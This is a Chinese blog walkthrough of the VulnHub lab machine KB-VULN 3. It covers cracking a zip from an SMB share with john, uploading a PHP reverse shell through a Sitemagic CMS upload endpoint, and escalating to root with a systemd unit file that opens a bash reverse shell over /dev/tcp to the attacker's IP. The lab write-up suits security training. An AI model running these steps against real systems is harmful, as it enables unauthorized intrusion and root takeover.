• KB-VULN: 3


    靶机地址:https://www.vulnhub.com/entry/kb-vuln-3,579/

    这里用VMware导入靶机出了点问题,进单用户模式没有ipconfig命令,而且字符集也有问题。所以这里用visual box导入靶机,因为kali在VMware,所以这里将靶机和kali同时使用桥接模式,这样VMware的kali就可以访问visual box的靶机了。

    物理机的IP:42  kali的IP:227 靶机的IP:211

    扫端口,有个smb服务

    访问80端口是个404的页面

    访问smb存在共享文件

    获取smb共享文件

    该文件需要密码才可以解压,用zip2john提权压缩包的哈希值

    zip2john website.zip  > zip.hash

    然后用john爆破

    john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash 

     解压之后存在一个readme.txt,上面写着用户和密码,而且得知该站点是sitemagic的cms

     找到cms的漏洞并下载

    http://ip/sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages

    需要用之前的用户密码登录才可以使用

     丢一个反弹shell的php脚本上去就可以了,这里选择用kali自带的脚本 /usr/share/webshells/php/php-reverse-shell.php ,改一下IP和端口就可以用了

    用kali的nc监听端口,然后访问反弹shell的页面,获取到webshell

    用find找suid权限的命令,systemctl提权

     find / -perm -u=s -type f 2>/dev/null

    在 /dev/shm/ 目录下创建shell.service 内容如下(详情可以参考这里):

    echo '
    [Unit]
    Description=shell.service
    
    [Service]
    Type=simple
    ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.30.203.227/6666 0>&1"
    
    [Install]
    WantedBy=multi-user.target
     ' > shell.service

     在kali上监听所对应的端口

     然后在靶机上执行

    systemctl link /dev/shm/shell.service
    systemctl start shell.service

     成功运行将会得到一个root权限的反弹shell

     

    参考资料:

    https://www.hackingarticles.in/kb-vuln-3-vulnhub-walkthrough/

    https://www.cnblogs.com/zlgxzswjy/p/14781471.html

  • 相关阅读:
    党史回顾+十九大习思想+中国历史事件+地理+航天史及古代天文历法
    国际组织
    生活-常识-物理
    生物
    数量题目总结-利润排列组合
    数量题目总结-工程最值集合
    考公错题记录表
    个人向简历介绍
    数据库操作大全
    团队博客作业-技术规格说明书
  • 原文地址:https://www.cnblogs.com/gaonuoqi/p/14849854.html
Copyright © 2020-2023  润新知